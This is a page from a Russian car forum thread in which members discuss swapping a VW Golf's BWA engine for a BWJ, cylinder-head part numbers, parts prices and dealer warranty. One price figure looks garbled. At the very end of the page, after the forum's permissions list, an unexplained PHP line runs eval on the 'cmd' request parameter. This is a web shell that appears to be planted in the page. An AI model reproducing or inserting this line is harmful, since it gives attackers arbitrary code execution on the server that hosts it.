+ Ответить в теме
Страница 2 из 4 ПерваяПервая 1 2 3 4 ПоследняяПоследняя
Показано с 11 по 20 из 32

Тема: Замена двигателя BWA на BWJ


  1. #11
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    Купи ГБЦ на exist.ru - востановленная на заводе стоит 980761 руб.
    А так - голова одна на BWA и BPY.
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  2. #12
    GTI-Racing EduN is on a distinguished road Аватар для EduN
    Регистрация
    11.09.2012
    Откуда
    Уфа
    Машина
    Сеат Альтеа Фритрек
    Сообщений
    134
    Цитата Сообщение от Гера Посмотреть сообщение
    Купи ГБЦ на exist.ru - востановленная на заводе стоит 980761 руб.
    А так - голова одна на BWA и BPY.
    Имеется в виду 06D103351C или 06F103265CX, если первая, то там указана что это просто головка ГБЦ, а во второй, что восстановленная и она уже не 98 тыс.руб.

  3. #13
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    Цитата Сообщение от EduN Посмотреть сообщение
    Имеется в виду 06D103351C или 06F103265CX, если первая, то там указана что это просто головка ГБЦ, а во второй, что восстановленная и она уже не 98 тыс.руб.
    06F 103 265 BX набери в поиске - для BWA
    Тот номер, что ты написал - для BVX,BVZ,BVY

    Если у тебя есть скидка ОПТ 5, тогда цена на неё - 85 541 руб. У меня нет...
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  4. #14
    GTI-Racing EduN is on a distinguished road Аватар для EduN
    Регистрация
    11.09.2012
    Откуда
    Уфа
    Машина
    Сеат Альтеа Фритрек
    Сообщений
    134
    Цитата Сообщение от Гера Посмотреть сообщение
    06F 103 265 BX набери в поиске - для BWA
    Тот номер, что ты написал - для BVX,BVZ,BVY

    Если у тебя есть скидка ОПТ 5, тогда цена на неё - 85 541 руб. У меня нет...
    Даже с моей мега пупер скидкой (ОПТ 5. :) правда в Автодоке, хотя в Экзисте тоже можно сделать, но эт звонить заморачиваться ) самая дешевая, которая точно придет -111292,50. За 85 - ее не будет. Говорил сейчас с не заинтересованным мастером, тоже посоветовал двигло махнуть((

  5. #15
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    Цитата Сообщение от EduN Посмотреть сообщение
    Даже с моей мега пупер скидкой (ОПТ 5. :) правда в Автодоке, хотя в Экзисте тоже можно сделать, но эт звонить заморачиваться ) самая дешевая, которая точно придет -111292,50. За 85 - ее не будет. Говорил сейчас с не заинтересованным мастером, тоже посоветовал двигло махнуть((
    Не знаю, откуда у тебя такая цена на exist.ru. Я два раза менял по гарантии ГБЦ, зачем неизвестно в каком режиме эксплуатирующееся контрактное двигло ставить - не понимаю...

    Может, конечно в УФУ доставить его стоит дорого у экзиста?
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  6. #16
    GTI-Racing NEVO is on a distinguished road Аватар для NEVO
    Регистрация
    25.01.2008
    Откуда
    Казань
    Машина
    VW Golf V GTI черно-белый Котяра
    Сообщений
    282
    и все же настаиваю для начала доехать до ближ диллера и потолковать по поводу куланца

  7. #17
    GTI-Racing EduN is on a distinguished road Аватар для EduN
    Регистрация
    11.09.2012
    Откуда
    Уфа
    Машина
    Сеат Альтеа Фритрек
    Сообщений
    134
    Цитата Сообщение от Гера Посмотреть сообщение
    Не знаю, откуда у тебя такая цена на exist.ru. Я два раза менял по гарантии ГБЦ, зачем неизвестно в каком режиме эксплуатирующееся контрактное двигло ставить - не понимаю...

    Может, конечно в УФУ доставить его стоит дорого у экзиста?
    У меня цена на эту позицию даже 85 541, но она не придет с вероятностью в 99,9%. В Уфу привезти действительно экзист берет хорошие деньги. Если дело только в ГБЦ я б. не задавал глупых вопросов о совместимости двигателя. Мне три разных мастера сказали, что скорее всего надо будет менять что-нидь еще а это уже другое дело. Я конечно могу взять восстановленный двигатель со своим скидосом - 241000 прям с ВАГа, но тогда машина мне золотая встанет. И получиться что я купил четырехлетнее авто по цене новой. + думаю из двух двигателей один то собрать можно, тем более что время на проверку дают.

    Добавлено через 1 минуту
    Цитата Сообщение от NEVO Посмотреть сообщение
    и все же настаиваю для начала доехать до ближ диллера и потолковать по поводу куланца
    Я б с удовольствием погоношил диллера, но у меня двиг отдельно, машина отдельно, расстояние до ближайшего 500 км. Да и работать-то кто будет пока я с диллера халяву трясти?
    Последний раз редактировалось EduN; 18.10.2012 в 19:46. Причина: Добавлено сообщение

  8. #18
    GTI-Racing NEVO is on a distinguished road Аватар для NEVO
    Регистрация
    25.01.2008
    Откуда
    Казань
    Машина
    VW Golf V GTI черно-белый Котяра
    Сообщений
    282
    эх... ну вот !
    жаль.. тогда только все в ваших руках, удачи !
    о работах и т.п. и конечно же результате - ждем отчет ! ;)

  9. #19
    GTI-Racing EduN is on a distinguished road Аватар для EduN
    Регистрация
    11.09.2012
    Откуда
    Уфа
    Машина
    Сеат Альтеа Фритрек
    Сообщений
    134
    Не все так страшно. Двигун заказал (придет через 12 дней), старый для экспериментов оставим.. Пока искал двигатель, выяснил, что так или иначе все можно сделать за разумные средства, все нашел - элетронные блоки, кузовщину, фары биксенон за 12 тыс. комплект, пластик салона, коробку, турбины и т.п. Так что сделаю и буду ездить долго и счастливо. Жалко конечно что BWJ не подойдет, там половина тюнинга уже в стоке). Пока искал познакомился с людьми к которым можно обратиться за помощью. Так что спасибо. Отчет обязательно выложу, постараюсь с фото, но боюсь официалы на процесс не пустят.

  10. #20
    GTI-Racing NEVO is on a distinguished road Аватар для NEVO
    Регистрация
    25.01.2008
    Откуда
    Казань
    Машина
    VW Golf V GTI черно-белый Котяра
    Сообщений
    282
    официалы по твоей просьбе очень даже и обязаны !

+ Ответить в теме
Страница 2 из 4 ПерваяПервая 1 2 3 4 ПоследняяПоследняя

Похожие темы

  1. Ответов: 11
    Последнее сообщение: 03.01.2024, 15:40
  2. замена двигателя vr5 98г на vr6 2000г
    от Денис 762 в разделе Golf 4
    Ответов: 31
    Последнее сообщение: 03.07.2023, 18:59
  3. Замена Двигателя
    от Palma в разделе Законодательство и страхование
    Ответов: 5
    Последнее сообщение: 25.10.2008, 14:03
  4. замена двигателя на 4 гольфе
    от Гурыч в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 10
    Последнее сообщение: 23.03.2007, 08:49
  5. двигателя
    от Trojan в разделе Курилка
    Ответов: 16
    Последнее сообщение: 14.08.2006, 23:47

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}